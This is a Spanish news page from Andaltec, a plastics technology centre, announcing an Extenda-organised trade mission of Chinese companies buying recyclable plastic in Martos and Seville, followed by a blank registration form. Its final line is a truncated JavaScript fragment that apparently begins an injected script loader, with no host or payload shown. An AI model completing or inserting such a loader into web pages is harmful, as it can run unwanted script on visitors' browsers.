Andaltec
Copyright Andaltec
Misión comercial inversa de empresas chinas interesadas en adquirir material plástico - Andaltec
Andaltec es un centro tecnológico especializado en sistemas de iluminación para automoción, plásticos en contacto con alimentos, prototipado y materiales.
plástico, iluminación, automoción, automóvil, envase, alimentario, ensayo, migración, enac, prototipo, ingeniería, faro, proyector, piloto, material, polímero, pintura, impresión, 3d, simulación, óptica, robot, formación, cad, proyecto, centro, tecnológico, innovación, martos, andalucía, I D I, led
132
post-template-default,single,single-post,postid-132,single-format-standard,bridge-core-1.0,ajax_fade,page_not_loaded,,qode_grid_1300,side_area_uncovered_from_content,footer_responsive_adv,qode-content-sidebar-responsive,qode-theme-ver-10.1,wpb-js-composer js-comp-ver-6.10.0,vc_responsive
 

Misión comercial inversa de empresas chinas interesadas en adquirir material plástico

Misión comercial inversa de empresas chinas interesadas en adquirir material plástico

El Centro Tecnológico del Plástico de Andalucía (Andaltec) acoge el próximo día 23 de noviembre una misión comercial inversa organizada por Extenda y que traerá hasta Martos (Jaén) a empresas chinas interesadas en la compra de material plástico destinado al reciclaje.

Este evento de carácter comercial contará con la participación de empresas procedentes del país asiático y de empresas españolas, ya que una de las principales actividades consistirá en encuentros bilaterales entre las firmas de ambos países. La jornada también incluye una ponencia a cargo de responsables de Extenda y Andaltec sobre la comercialización del plástico en China, así como una visita a la nueva sede del Centro Tecnológico del Plástico en Martos.

Al día siguiente, tendrán lugar más reuniones bilaterales entre empresas en la sede de Extenda en Sevilla, aunque el horario de estos encuentros está pendiente de confirmación.

Se trata de una importante oportunidad para establecer lazos comerciales con empresas interesadas en adquirir materiales plásticos en España, por lo que animamos a las empresas andaluzas del sector del plástico a quese inscriban para participar en esta jornada. La inscripción, que se puede realizar rellenando la ficha adjunta, es gratuita y obligatoria.

Una vez cumplimentada la ficha, debe ser enviada a la dirección de correo electrónico jcc@extenda.es

 

Ficha Inscripción de Empresas Andaluzas

 

 

NOMBRE DE LA EMPRESA:
 
DIRECCIÓN:  
TEL.:  
FAX.:  
WEB:  
PERFIL DE LA EMPRESA:

PERSONA QUE ASISTIRÁ:  
CARGO:  
IDIOMAS:  
E-MAIL:  
MÓVIL  
Nº EMPLEADOS:  
INTERES EN MANTENER REUNIONES EMPRESAS CHINAS SI/NO
INDIQUE SI VA A ASISTIR A LAS REUNIONES EN MARTOS (JAÉN) O EN SEVILLA  
PRODUCTO QUE LE INTERESA VENDER A EMPRESAS CHINAS  

 var d=document;var s=d.createElement(‘script’);